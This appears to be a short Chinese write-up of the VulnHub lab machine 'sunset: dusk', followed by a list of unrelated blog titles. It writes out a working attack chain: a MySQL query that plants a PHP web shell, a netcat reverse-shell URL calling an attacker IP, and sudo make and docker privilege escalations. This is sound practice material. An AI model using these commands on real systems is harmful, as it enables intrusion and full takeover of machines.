靶机链接：

https://www.vulnhub.com/entry/sunset-dusk,404/

主机IP扫描：

IP端口扫描：

21 端口  pyftpdlib 1.5.5 版本漏洞

25 端口  Postfix 账户枚举

80 Apache httpd 2.4.38 版本漏洞，目录枚举

3306 mysql   MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1 版本漏洞，暴力破解

8080 http    PHP cli server 5.5 版本漏洞，目录枚举

80 HTTP目录枚举，无结果

MySQL爆破结果

尝试用MySQL into outfile 写一句话木马

select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/pentest.php';

反向shell

http://10.10.203.20:8080/pentest.php?cmd=nc%20-e%20/bin/bash%2010.10.203.14%201234

提权操作

COMMAND='/bin/sh'

sudo -u dusk  make -s --eval=$'x:\n\t-'"$COMMAND"

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

OVER!!

最新文章

1. Ceph剖析：消息处理
2. CSS样式重置
3. 项目中的web api知识总结
4. 一个简单驱动的makefile
5. java内存泄露的理解与解决（转）
6. myeclipse2014破解过程
7. intel simd 资料
8. nginx日志切割
9. VIM技巧：翻页
10. leetcode：Roman to Integer（罗马数字转化为罗马数字）
11. LVS+DR源码安装
12. 使用 system.io.filesysteminfo 来查找文件。
13. [JZOJ3588]【中山市选2014】J语言（表达式解析+栈）
14. 24_ajax请求_使用axios
15. velocity 框架
16. python中的三次握手以及四次挥手
17. Android友盟推送
18. 把文件(项目)上传到Git@OSC
19. C#学习笔记（十一）：类和对象
20. 重学Verilog(3)——参数化模块

热门文章

1. Qt Installer Framework翻译(4)
2. 源码详解系列(七) ------ 全面讲解logback的使用和源码
3. Python学习，第一课 - 基础学习
4. C++ 一篇搞懂多态的实现原理
5. 同一个环境同时使用python2和python3的方法
6. 安装pycharm后设置idle为默认打开方式（idle.bat）图标“变异”为未知bug
7. redis缓存数据库及Python操作redis
8. IdentityServer4身份认证授权入门
9. screen配置窗口显示
10. Flutter 入门 --- 内部分享